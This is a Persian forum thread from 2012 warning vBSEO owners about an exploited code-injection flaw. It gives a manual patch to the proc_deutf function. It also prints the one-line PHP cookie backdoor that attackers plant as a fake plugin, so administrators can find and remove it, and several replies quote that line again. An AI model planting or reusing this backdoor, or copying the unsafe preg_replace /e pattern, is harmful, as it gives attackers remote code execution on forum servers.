پچ جدید وی بی سئو - هشدار به دارندگان vBSEO

**VBIran** · 2012/01/28, 01:46 PM

درود.

این باگ روی تمامی ورژن های وی بی سئو که در حال حاضر توسط وی بی سئو پشتیبانی میشود موجود است .

vBSEO 3.6.0
vBSEO 3.5.2
vBSEO 3.5.1 (including PL release)
vBSEO 3.5.0

وی بی سئو یک پچ برای رفع اکسپلویت جدید پنهان در آن ارائه کرده است :

اگر از وی بی سئو استفاده میکند باید حتماً این کار را انجام دهید در غیر این صورت ویبولتین شما امن نخواهد بود .

http://www.vbseo.com/f5/vbseo-securi...release-52783/

اگر لایسنس وی بی سئو را دارید :

http://www.vbseo.com/downloads/

اگر اقدام به تهیه لایسنس نکرده اید و از نسخه نال شده استفاده میکنید :

کد:

/vbseo/includes/functions_vbseocp_abstract.php

به این مسیر بروید .

پیدا کنید :

کد:

public static function proc_deutf($ptxt, $tocharset){
$ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', "$1")) ? $_s : "$1").stripslashes(\'$2\')', $ptxt);
return $ptxt;
}

جایگزین کنید با :

کد:

public static function proc_deutf($ptxt, $tocharset){
$ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s =  iconv("UTF-8", \''.$tocharset.'\', \'$1\')) ? $_s :  \'$1\').stripslashes(\'$2\')', $ptxt);
return $ptxt;
}

به گفته وی بی سئو : در انجام این کار سریع باشید .

ضمناً هکر ها یک پلاگین را نیز در ویبولتین شما آپلود میکنند پس اگر در قسمت :

ادمین سی پی --> پلاگین ها و محصولات --> مدیریت پلاگین ها

فایل مشکوکی میبینید و دارای محتوای :

کد:

/* vBCMS Global Thread Cache */ (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);

سریعاً آن را حذف کنید .

موفق باشید ،

وی بی ایران

**تبلیغات سایت** · 2012/01/28 01:46 PM

**GoyaFilter** · 2012/01/28, 02:04 PM

درود مرسی میشه در مورد ادمین سی پی یه خورده بیشتر صحبت کنید ؟ مثلا این کد از کجا مثال زدید ؟

کد:

/* vBCMS Global Thread Cache */ (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);

**OmidX** · 2012/01/28, 02:16 PM

این قبلا اطلاع رسانی شده بود ، فک کنم .

**GoyaFilter** · 2012/01/28, 02:17 PM

نوشته اصلی توسط OmidX

این قبلا اطلاع رسانی شده بود ، فک کنم .

نه داداش اون فرق میکرد.این تازه هست

**OmidX** · 2012/01/28, 02:22 PM

نوشته اصلی توسط GoyaFilter

نه داداش اون فرق میکرد.این تازه هست

همونه فک کنم : http://www.vbiran.ir/thread24328.html

**GoyaFilter** · 2012/01/28, 02:28 PM

نوشته اصلی توسط OmidX

همونه فک کنم : http://www.vbiran.ir/thread24328.html

بله اقا تایید میشه صحبت شما : اصل اخبار مربوط به تاریخ 01-23-2012 بوده .

**nice_son_20** · 2012/01/28, 02:35 PM

ممنون

یکم بیستر در مورد این توضیع بدین :

کد:

/* vBCMS Global Thread Cache */ (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);